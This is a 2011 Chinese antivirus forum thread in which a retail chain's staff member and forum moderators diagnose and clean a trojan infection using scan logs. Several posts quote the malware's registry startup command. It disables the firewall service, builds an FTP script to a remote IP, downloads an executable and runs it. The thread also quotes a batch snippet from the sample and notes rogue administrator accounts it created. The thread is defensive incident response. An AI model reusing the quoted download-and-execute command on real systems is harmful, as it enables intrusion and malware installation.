net use bye xuzijianyes /add(net病毒) bbs.ikaka.com

吴文和 - 2011-5-27 22:46:00

因为我们是做珠宝销售的，开连锁店是正常的，分店通过ADSL后，走VPN和我们总部联系，结果，就中了 net use bye xuzijianyes /add。好像叫net病毒，把我的ftp.exe搞得说系统找不到该文件，明明该文件就存在。而且，就是安装了sql 2000，并提升用户为管理员后，中招的。用了版主介绍的sreng扫描一下，随后贴上我的扫描日志，都是分店电脑。

已解决：想不到我提供的木马被大版主采样了。好高兴！问题已经解决了，谢谢各位的帮助！

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; QQDownload 677; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; MS-RTC LM 8; AskTB5.6)

byxxdrls - 2011-5-28 18:43:00

建议你下载金山的黑客补丁http://bbs.duba.net/attachment.p ... ohBY9%2Bw3DhU6DUNRE

吴文和 - 2011-5-28 20:46:00

谢谢老大！今天值班过去用sreng2扫描后得出一个重要结果：ftp.exe原来是被映像劫持了，难怪，我从其他地方拷贝一个无问题的ftp.exe，系统却提示该文件无效，不是可以程序。后来激动，把注册表中被劫持的ftp.exe删除了，重新拷贝ftp.exe过来，一切恢复正常。忘记备份注册表。呵呵。太激动了。
只是ftp.exe恢复正常而已，那个shell项直到下班也没去理会。明天继续吧。附上扫描结果。

附件: sreng2.log (2011-5-28 20:45:30, 75.87 K)
该附件被下载次数 588

yujinyjyj - 2011-5-28 22:13:00

使用金山急救箱试试

吴文和 - 2011-5-29 20:02:00

今天过来公司值班，远程到有问题的那部电脑，发现：net use bye xuzijianyes /add已经没有了，shell项的内容变成了：c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi。很明显，木马就是看中了这电脑刷卡机，估计从60.173.10.220安徽铜陵电信服务器中下载2.exe放在c:\windows\system32，并且附带了sb.txt文件，该sb.txt文件图标被伪装成系统无法辨认模样，用记事本打开后，发现会下载68.exe文件，但是我搜索整个硬盘没发现，包括隐藏文件夹也没有，我马上把这2.exe sb.txt删除，然后，在C:\Documents and Settings中，将所有用户文件夹里面的cmd.txt删除。可惜的是，注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的“shell” c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi，我却无法删除，提示我没有修改或者删除的权限。哎，管理员权限都无法删除，这个木马制作者，实在太狠了。咱们论坛里面有没有这样的高手？（貌似这个作者写出来的这个东西最近很流行的）
还有，它还会自己产生几个未知的用户：bodong,asd,全部是管理员权限的。看来，我只能重新安装系统了。

附上第二次扫描结果：

附件: SREngLOG.log (2011-5-29 20:10:15, 78.81 K)
该附件被下载次数 352

吴文和 - 2011-5-29 20:35:00

我先传两个三个文件吧。好像都是木马来的

第一个：发现的地方位于c:\windows\system32,有一个文件夹名字是1025，里面放了这两个文件

附件: 新建文件夹.zip (2011-5-29 20:35:25, 554 B)
该附件被下载次数 387

第二个文件：发现的地方是在C:\Documents and Settings下每个用户的文件夹都存在。cmd.txt

附件: cmd.txt (2011-5-29 20:35:25, 57 B)
该附件被下载次数 370

天才小菜鸟1 - 2011-5-29 22:25:00

tasklist|findstr /i "PROFILER90.exe" && shutdown -s -t 0
tasklist|findstr /i "PROFILER90.exe" && shutdown -s /f
tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s -t 0
tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s /f
tasklist|findstr /i "profiler.exe" && shutdown -s -t 0
tasklist|findstr /i "profiler.exe" && shutdown -s /f
del c:\windows\system32\1025\si.bat
顺便帮你发出来影子系统下测试的 - -

networkedition - 2011-5-30 9:55:00

c:\documents and settings\all users\application data\storm\update\%youshizhuay%\lcoef.cc3
c:\documents and settings\all users\drm\%sessionname%\nqmwj.mp3
c:\documents and settings\local user\windows.dll
c:\program files\windows media player\commtb32.dll
以上四个文件找到压缩发来。

吴文和 - 2011-5-30 20:52:00

引用:

原帖由 networkedition 于 2011-5-30 9:55:00 发表
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\lcoef.cc3
c:\documents and settings\all users\drm\%sessionname%\nqmwj.mp3
c:\documents and settings\local user\windows

小的无能为力，只找到前面两个文件，windows.dll和commtb32.dll一直未能找到。

附件: 新建文件夹 (3).rar (2011-5-30 20:51:40, 250.99 K)
该附件被下载次数 635

吴文和 - 2011-5-31 17:11:00

怀疑公司被入侵了。又一台电脑中招了，所有必须启动的服务已经被停止，无法启动，启动就报错。

最新拷贝的可疑程序压缩包：

附件: net_2.zip (2011-5-31 17:10:44, 264.66 K)
该附件被下载次数 407

吴文和 - 2011-5-31 17:35:00

在c:\windows\system32下面，找到了木马作者的自我介绍：
斯文哥又来抓鸡了，唉QQ413968336
斯文哥又来抓鸡了，唉QQ413968336
斯文哥又来抓鸡了，唉QQ413968336
子健哥又来抓鸡了，唉QQ413968336
子健哥又来抓鸡了，唉QQ413968336
子健哥又来抓鸡了，唉QQ413968336
子健哥又来抓鸡了，唉QQ413968336
Sun网络 www.muhuo.com
冷炫哥哥在次辉煌起来QQ 11156454.
清风可否吹走破碎的梦。

附上我找到的可疑文件：

附件: 新建文件夹.zip (2011-5-31 17:35:08, 802.13 K)
该附件被下载次数 324

吴文和 - 2011-5-31 17:50:00

这木马真小人，放那么多东西，害我电脑什么都用不了，只能移动鼠标查看东西了。
附上扫描文件：

附件: SREngLOG.log (2011-5-31 17:50:23, 143.84 K)
该附件被下载次数 262

湖心小筑 - 2011-5-31 18:47:00

能否留QQ交流

吴文和 - 2011-5-31 18:49:00

我QQ号码是475553712

networkedition - 2011-6-1 10:04:00

此样本已收集反馈。另12楼的日志分析如下：下载此工具：http://bbs.ikaka.com/attachment.aspx?attachmentid=653828删除以下文件
c:\documents and settings\all users\application data\storm\update\%sessionname%\yetgd.cc3
c:\documents and settings\all users\drm\%sessionname%\dlvvm.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\fbguc.cc3
启动项目－－注册表之如下项删除：
[shell] <c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 14.210.97.246 >
shell如果无法删除可以添加everyone并设置完全控制权限之后再删除此项。
另如方便请将c:\program files\benchi.exe压缩发来。

networkedition - 2011-6-1 10:11:00

11楼样本瑞星可以查杀

吴文和 - 2011-6-1 12:08:00

谢谢大版主。benchi.exe估计被我删除了。而且对方系统也还原了。应该还有其他店铺电脑存在相同问题，我找到了压缩上来。这木马释放的文件太多了，我也只是找到了一部分。找到可疑文件后我也会压缩放上去。

吴文和 - 2011-6-1 12:16:00

为了不影响店铺销售，我直接恢复了系统，其他盘符未作任何处理，留待查看。有新的可疑文件马上压缩过来。谢谢大版主，谢谢广大网友。

networkedition - 2011-6-1 14:42:00

9楼样本：
1、文件名：nqmwj.mp3

病毒名：Trojan.Win32.Fednu.ddh

2、文件名：yetgd.cc3

病毒名：Backdoor.Win32.LastOne.tc

3、文件名：lcoef.cc3
不是病毒

吴文和 - 2011-6-27 10:59:00

今天发现了新net病毒变种，不知道对大版主有用没？先传扫描文件，具体上传哪些文件等待大版主通知。

扫描文件：

附件: SREngLOG.log (2011-6-27 11:01:33, 43.39 K)
该附件被下载次数 241

networkedition - 2011-6-27 11:20:00

c:\windows\781343.exe
c:\windows\system32\knideyrmb.jpg
c:\program files\dhfq\yyuwbnkao.bmp
c:\windows\filename.jpg
c:\documents and settings\360.dll
c:\program files\uima\lxkwishlu.jpg
c:\windows\system32\yjsoft.ini
c:\program files\common files\svchest13943.exe
c:\windows\v2011.exe
c:\program files\common files\svchest13941.exe
c:\program files\common files\svchest13956.exe
c:\program files\common files\svchest13912.exe
c:\program files\common files\svchest13930.exe
c:\program files\qktgdy htnfihjj\explorer.exe
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\jquer.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\xlyuu.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\vtndm.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\ofllq.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\pcwxh.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\oqrgd.cc3
c:\windows\system32\rbmytfc.dll
c:\windows\system32\360.dll
c:\windows\system32\knideyrmb.jpg
c:\program files\uima\lxkwishlu.jpg
c:\program files\dhfq\yyuwbnkao.bmp
c:\windows\filename.jpg
c:\windows\system32\wnugshlw.dll
[已启用] At5.job
C:\WINDOWS\system32\cls.bat
[已启用] At4.job
C:\PROGRA~1\Dianji\LAVA-L~1\LAVA-L~1.EXE
[已启用] At3.job
E:\PROGRA~1\GKEXPR~1\LAVA-L~1.EXE
[已启用] At2.job
e:\backup\start.cmd
[已启用] At1.job
e:\backup\start.cmd
[已启用] hf255.job
E:\sqlbackup\hf255.bat
[已启用] At6.job
C:\WINDOWS\system32\cls.bat

文件太多了，先用你装的杀毒软件进行杀毒啊。不行先装个瑞星进行全盘杀毒。

networkedition - 2011-6-27 11:21:00

这个启动项也要删除<shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 222.186.33.52> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&p -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit> [(Verified)Microsoft Windows Component Publisher]

瑞星卡卡安全论坛